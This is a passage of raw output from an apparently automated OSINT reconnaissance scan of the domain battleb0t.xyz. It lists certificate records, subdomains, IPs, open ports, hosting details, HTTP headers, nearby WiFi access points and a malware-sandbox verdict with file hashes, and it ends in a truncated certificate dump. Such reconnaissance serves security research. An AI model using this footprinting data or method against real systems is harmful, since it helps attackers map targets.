u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.484', u'id': 9249459074}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.388', u'id': 9234809365}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:13.113', u'id': 9235878846}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:12.941', u'id': 9221147142}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.973', u'id': 9235401447}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.703', u'id': 9220770682}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.723', u'id': 9022375882}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.353', u'id': 8994750711}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.489', u'id': 9021136086}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.221', u'id': 9002142810}, {u'not_after': u'2023-06-21T22:37:04', u'not_before': u'2023-03-23T22:37:05', u'issuer_ca_id': 180753, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.battleb0t.xyz', u'serial_number': u'26cc7f01c692257813509e4880751557', u'entry_timestamp': u'2023-03-23T23:37:05.821', u'id': 8969484265}, {u'not_after': u'2024-03-21T23:59:59', u'not_before': u'2023-03-23T00:00:00', u'issuer_ca_id': 157938, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O="Cloudflare, Inc.", CN=Cloudflare Inc ECC CA-3', u'common_name': u'sni.cloudflaressl.com', u'serial_number': u'09cccb40358f10167bc737cb947e311a', u'entry_timestamp': u'2023-03-23T22:34:16.439', u'id': 8968494929}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.433', u'id': 8986351441}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.351', u'id': 8968126634}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.184', u'id': 8924480030}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.009', u'id': 8896621265}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.523', u'id': 8910975043}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.327', u'id': 8879939167}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.355', u'id': 8910971688}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.097', u'id': 8879934651}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.564', u'id': 8805533709}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.238', u'id': 8735518973}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.219', u'id': 8798937211}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.05', u'id': 8726555656}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.851', u'id': 8798923488}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.639', u'id': 8726539247}, {u'not_after': u'2023-05-14T15:23:50', u'not_before': u'2023-02-13T15: |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SitecomC8B210 (Net ID: 00:0C:F6:C8:B2:10) | 50.8897, 6.0563 |
| 2023-05-12 03:01:37 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.138): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:01:23 | Raw Data from RIRs | No | Tool - WhatWeb | 0 | 0 | 1 | 0 | None | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://battleb0t.xyz', u'http_status': 301, u'plugins': {u'Via-Proxy': {u'string': [u'1.1 varnish']}, u'HTTPServer': {u'string': [u'GitHub.com']}, u'RedirectLocation': {u'string': [u'https://battleb0t.xyz/']}, u'UncommonHeaders': {u'string': [u'x-github-request-id,x-served-by,x-cache-hits,x-timer,x-fastly-request-id']}, u'IP': {u'string': [u'185.199.109.153']}, u'Title': {u'string': [u'301 Moved Permanently']}}}, {}] | battleb0t.xyz |
| 2023-05-12 02:44:40 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Netlify | funny.battleb0t.xyz |
| 2023-05-12 03:01:10 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.121): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:46:23 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 0, u'threat_score': None, u'compromised_hosts': [], u'environment_id': None, u'major_os_version': None, u'submit_name': u'bounty-92442219031035527', u'signatures': [], u'threat_level': 2, u'size': 1419336, u'job_id': None, u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [], u'certificates': [], u'hosts': [], u'sha256': u'ac2a1743bbfc19268c36280b50a003366d41854863d4808099cd87f77fa5f433', u'sha512': u'e273fdf72f1e793f0e64d4f3e1a806ab4ef5a8ad408ba7ae3c2b076ac23bbd1b9119523cafeb5e192434a0f346295466fc22237ed2126ed8e55e0f8da6d242d9', u'image_file_characteristics': [], u'submissions': [{u'url': None, u'submission_id': u'645d3ce2af7b0ff2260e5236', u'created_at': u'2023-05-11T19:07:14+00:00', u'filename': u'bounty-90327936975996565'}, {u'url': None, u'submission_id': u'645a116ce5c0a446340055ff', u'created_at': u'2023-05-09T09:25:00+00:00', u'filename': u'bounty-39937054808366222'}, {u'url': None, u'submission_id': u'645a116b8df30921840aa091', u'created_at': u'2023-05-09T09:24:59+00:00', u'filename': u'bounty-560768034402953'}, {u'url': None, u'submission_id': u'644d33e57683d791910db8fd', u'created_at': u'2023-04-29T15:12:37+00:00', u'filename': u'bounty-29178209918618665'}, {u'url': None, u'submission_id': u'644d33d56c17eff7d8016bf3', u'created_at': u'2023-04-29T15:12:21+00:00', u'filename': u'bounty-82711745860172702'}, {u'url': None, u'submission_id': u'644cddb7bb622c5f61019549', u'created_at': u'2023-04-29T09:04:55+00:00', u'filename': u'bounty-21770663952260623'}, {u'url': None, u'submission_id': u'64469d8b5cbe8e496109f46d', u'created_at': u'2023-04-24T15:17:31+00:00', u'filename': u'rufus-3.22.exe'}, {u'url': None, u'submission_id': u'642ccd07ae9486a8b0093780', u'created_at': u'2023-04-05T01:21:11+00:00', u'filename': u'bounty-92500669916413772'}, {u'url': None, u'submission_id': u'642ccd05dbb8e3e14b0f62a6', u'created_at': u'2023-04-05T01:21:09+00:00', u'filename': u'bounty-92442219031035527'}], u'analysis_start_time': u'2023-04-05T01:21:09+00:00', u'tags': [], u'imphash': None, u'total_network_connections': 0, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 0, u'image_base': None, u'error_origin': None, u'ssdeep': None, u'entrypoint_section': None, u'md5': u'f3a93569ce2aa9409e2ffba3d7edb4db', u'network_mode': u'default', u'processes': [], u'sha1': u'f68e9d61523742e40ff2760972feb40286bdef55', u'url_analysis': False, u'type': u'PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed', u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Static Analysis', u'verdict': u'malicious', u'minor_os_version': None, u'domains': [], u'extracted_files': [], u'type_short': [u'peexe', u'executable']}, {u'subsystem': u'Windows Gui', u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 1, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': 4, u'submit_name': u'rufus-3.22.exe', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-176', u'name': u'Calls an API typically used to retrieve function address', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1106', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1106', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"rufus-3.22.exe" called "GetProcAddress" with a parameter BufferedPaintUnInit (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter ImmGetContext (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter ImmReleaseContext (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter GetThemeTextExtent (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter RegisterTraceGuidsW (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter OpenThreadToken (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter OpenProcessToken (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter AllocateAndInitializeSid (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter CheckTokenMembership (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter FreeSid (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter InternetCrackUrlA (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter InternetConnectA (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter InternetReadFile (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter InternetCloseHandle (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter HttpOpenRequestA (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter HttpSendRequestA (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter HttpQueryInfoA (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter FlsGetValue (UID: 00000000-00003036)'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-7', u'name': u'Loads modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"rufus-3.22.exe" loaded module "COMCTL32.DLL" at base 73b70000\n "rufus-3.22.exe" loaded module "API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL" at base 74dc0000\n "rufus-3.22.exe" loaded module "WININET" at base 754d0000\n "rufus-3.22.exe" loaded module "KERNEL32.DLL" at base 76f60000\n "rufus-3.22.exe" loaded module "ADVAPI32.DLL" at base 76b50000\n "rufus-3.22.exe" loaded module "COMDLG32.DLL" at base 75780000\n "rufus-3.22.exe" loaded module "CRYPT32.DLL" at base 74dd0000\n "rufus-3.22.exe" loaded module "GDI32.DLL" at base 75990000\n "rufus-3.22.exe" loaded module "MSVCRT.DLL" at base 75c40000\n "rufus-3.22.exe" loaded module "OLE32.DLL" at base 75800000\n "rufus-3.22.exe" loaded module "SHELL32.DLL" at base 75f00000\n "rufus-3.22.exe" loaded module "SHLWAPI.DLL" at base 76cf0000\n "rufus-3.22.exe" loaded module "USER32.DLL" at base 75d80000\n "rufus-3.22.exe" loaded module "SSPICLI.DLL" at base 74b80000\n "rufus-3.22.exe" loaded module "RPCRT4.DLL" at base 75e50000\n "rufus-3.22.exe" loaded module "PROFAPI.DLL" at base 74d00000'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-175', u'name': u'Calls an API typically used to load libraries', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"rufus-3.22.exe" called "LoadLibrary" with a parameter comctl32.dll (UID: 00000000-00003036)\n "rufus-3.22.exe" called "LoadLibrary" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00003036)\n "rufus-3.22.exe" called "LoadLibrary" with a parameter WinInet (UID: 00000000-00003036)\n "rufus-3.22.exe" called "LoadLibrary" with a parameter KERNEL32.DLL (UID: 00000000-00003036)\n "rufus-3.22.exe" called "LoadLibrary" with a parameter ADVAPI32.dll (UID: 00000000-00003036)\n "rufus-3.22.exe" called "LoadLibrary" with a parameter COMCTL32.dll (UID: 00000000-00003036)\n "rufus-3.22.exe" called "LoadLibrary" with a parameter COMDLG32.DLL (UID: 00000000-00003036)\n "rufus-3.22.exe" called "LoadLibrary" with a parameter CRYPT32.dll (UID: 00000000-00003036)\n "rufus-3.22.exe" called "LoadLibrary" with a parameter GDI32.dll (UID: 00000000-00003036)\n "rufus-3.22.exe" called "LoadLibrary" with a parameter msvcrt.dll (UID: 00000000-00003036)\n "rufus-3.22.exe" called "LoadLibrary" with a parameter ole32.dll (UID: 00000000-00003036)\n "rufus-3.22.exe" called "LoadLibrary" with a parameter SHELL32.dll (UID: 00000000-00003036)\n "rufus-3.22.exe" called "LoadLibrary" with a parameter SHLWAPI.dll (UID: 00000000-00003036)\n "rufus-3.22.exe" called "LoadLibrary" with a parameter USER32.dll (UID: 00000000-00003036)\n "rufus-3.22.exe" called "LoadLibrary" with a parameter kernel32.dll (UID: 00000000-00003036)\n "rufus-3.22.exe" called "LoadLibrary" with a parameter SspiCli.dll (UID: 00000000-00003036)\n "rufus-3.22.exe" called "LoadLibrary" with a parameter WINTRUST.DLL (UID: 00000000-00003036)\n "rufus-3.22.exe" called "LoadLibrary" with a parameter %WINDIR%\\system32\\CRYPT32.dll (UID: 00000000-00003036)\n "rufus-3.22.exe" called "LoadLibrary" with a parameter imagehlp.dll (UID: 00000000-00003036)'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-8', u'name': u'Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"150016002c7ab36c@ADVAPI32.dll"\n "0e000f00a47ab36c@ADVAPI32.dll"\n "0e000f00d87ab36c@ADVAPI32.dll"\n "11001200a47fb36c@ADVAPI32.dll"\n "12001300b87fb36c@ADVAPI32.dll"\n "12001300e07fb36c@ADVAPI32.dll"\n "140015009493b36c@ADVAPI32.dll"\n "0d000e00588fb36c@WinInet.DLL"\n "0d000e00a08fb36c@WinInet.DLL"\n "10001100b08fb36c@WinInet.DLL"\n "100011002890b36c@WinInet.DLL"\n "100011003c90b36c@WinInet.DLL"\n "0d000e000080b36c@SHELL32.dll"\n "0d000e005480b36c@SHELL32.dll"\n "100011000094b36c@CRYP | 185.199.111.153 |
| 2023-05-12 03:09:01 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.97 | 87.248.157.102 |
| 2023-05-12 02:54:12 | HTTP Headers | No | Web Spider | 8 | 0 | 1 | 0 | None | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-ewr18140-EWR", "x-cache": "HIT", "x-github-request-id": "1AD4:4FA0:AFAB37:106D10A:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "47e9025f17d9e6e936d804b3c00d7989ec4a827a", "date": "Fri, 12 May 2023 02:54:12 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "559", "x-timer": "S1683860053.987504,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} | battleb0t.xyz |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | KnowYourMeme (Category: social)
https://knowyourmeme.com/users/login | login |
| 2023-05-12 03:04:46 | Hosting Provider | No | Hosting Provider Identifier | 0 | 0 | 3 | 0 | None | Cloudflare Inc: https://www.cloudflare.com/ | 104.21.71.14 |
| 2023-05-12 02:46:38 | BGP AS Membership | No | RIPE | 0 | 0 | 3 | 0 | None | 36459 | 185.199.110.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | FNCU-Guest (Net ID: 00:00:0D:09:DE:0C) | 41.8781, -87.6298 |
| 2023-05-12 02:54:03 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 172.67.135.9:2096 | 172.67.135.9 |
| 2023-05-12 03:01:18 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.157): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:30 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 64.226.81.43:443 | 64.226.81.43 |
| 2023-05-12 03:01:27 | Web Server | No | Tool - WhatWeb | 0 | 0 | 2 | 0 | None | cloudflare | oldfluid.battleb0t.xyz |
| 2023-05-12 03:11:22 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 3 | 0 | None | {u'city': u'Frankfurt am Main', u'security': {u'is_vpn': False}, u'city_geoname_id': 2925533, u'region_geoname_id': 2905330, u'country': u'Germany', u'region': u'Hesse', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'DIGITALOCEAN-ASN', u'isp_name': u'DigitalOcean, LLC', u'organization_name': u'Digital Ocean', u'autonomous_system_number': 14061}, u'continent_code': u'EU', u'currency': {u'currency_name': u'Euros', u'currency_code': u'EUR'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/DE_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/DE_flag.png', u'unicode': u'U+1F1E9 U+1F1EA', u'emoji': u'\U0001f1e9\U0001f1ea'}, u'postal_code': u'60313', u'longitude': 8.6843, u'country_code': u'DE', u'timezone': {u'abbreviation': u'CEST', u'gmt_offset': 2, u'is_dst': True, u'name': u'Europe/Berlin', u'current_time': u'05:11:21'}, u'latitude': 50.1188, u'country_geoname_id': 2921044, u'continent_geoname_id': 6255148, u'country_is_eu': True, u'ip_address': u'207.154.228.169', u'continent': u'Europe', u'region_iso_code': u'HE'} | 207.154.228.169 |
| 2023-05-12 02:55:15 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | Ubuntu Linux | 165.232.113.85 |
| 2023-05-12 02:50:17 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | kekw.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:53:52:1f:22:68:d4:e4:bd:04:c1:ea:37:ae:da:35:a4:38
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 27 17:58:43 2023 GMT
Not After : Apr 27 17:58:42 2023 GMT
Subject: CN=kekw.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:b9:fb:28:d5:65:83:30:d8:31:05:3e:6a:85:ce:
46:6b:90:7d:d6:90:24:15:f6:22:bc:5f:40:25:72:
5b:e7:43:22:3b:78:ef:22:83:15:af:43:b2:d9:fc:
7d:1a:db:a9:94:2a:ae:eb:dd:dd:89:95:48:86:c7:
3d:d8:4e:b8:52:f3:2e:7f:e0:9b:c5:82:6c:d6:06:
76:85:79:68:7f:b5:68:c5:54:d6:da:9f:0d:42:eb:
eb:78:16:9b:0c:f7:71:92:43:a6:d3:11:c7:27:14:
9e:cd:a5:85:3a:ff:06:6c:60:87:93:13:2c:dc:e9:
44:30:af:d5:55:3a:74:21:37:cc:29:72:2e:4e:f5:
19:19:e6:5d:c6:1c:c3:32:ad:91:33:45:63:c0:b2:
66:88:d4:28:10:ab:35:bf:1b:e2:b6:13:51:c2:fc:
05:07:9b:c6:54:ae:64:1d:50:a0:d8:e2:04:77:50:
9f:40:dd:68:16:1e:0c:0e:81:fa:eb:72:cf:f5:36:
95:d2:67:c3:4f:8e:c3:73:28:01:74:88:7e:c4:4f:
a7:e9:b7:fe:c9:c0:ff:2f:b4:44:b8:a3:61:79:25:
57:1a:c6:7d:41:02:2b:48:a8:75:9f:e9:8a:a8:25:
11:37:66:07:b2:f9:47:e8:c4:ab:b8:9a:0e:7a:bb:
b1:a5:ac:71:ee:85:d1:b6:9f:8c:59:d9:a4:ba:7d:
dc:a9:3f:d4:a9:da:6b:49:93:8d:b7:ed:d0:10:10:
3a:3d:a1:8d:54:88:45:8c:e7:d6:54:5d:8e:e4:5d:
c5:ff:df:b9:f9:a2:ee:ab:9f:c6:3f:4b:06:4d:63:
71:ab:51:6b:7d:38:3e:f3:da:53:ac:5a:a8:0b:4f:
7e:c7:d9:39:5d:36:7e:8b:ff:14:dd:1d:2a:34:03:
79:b2:19:e1:3c:2c:2f:e4:2d:a4:3c:e2:7a:8d:47:
92:45:d5:da:6b:08:e3:22:df:a9:94:5a:8f:90:14:
e5:6c:68:e1:1d:22:8f:1f:c3:5c:b7:24:90:75:5a:
e0:2a:31:19:c8:a9:78:9c:0a:51:95:3b:87:0c:a7:
99:0e:be:1b:bc:21:15:fe:dc:b9:6b:b1:e8:e2:43:
9f:ad:fd:5c:22:a4:20:c6:26:c0:2b:14:2d:ae:44:
dc:33:d8:22:aa:11:57:d7:44:19:1d:80:bb:50:5d:
0f:32:1b:da:79:77:90:80:ce:c3:28:c7:75:3b:c6:
47:f2:e5:98:64:b3:70:12:44:40:b0:21:b9:37:16:
ba:3e:63:8e:8d:d6:ba:d1:98:a1:05:b6:1a:03:b9:
41:51:80:5e:8c:55:bd:f9:47:df:ee:3c:ed:aa:ae:
83:f7:8f
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
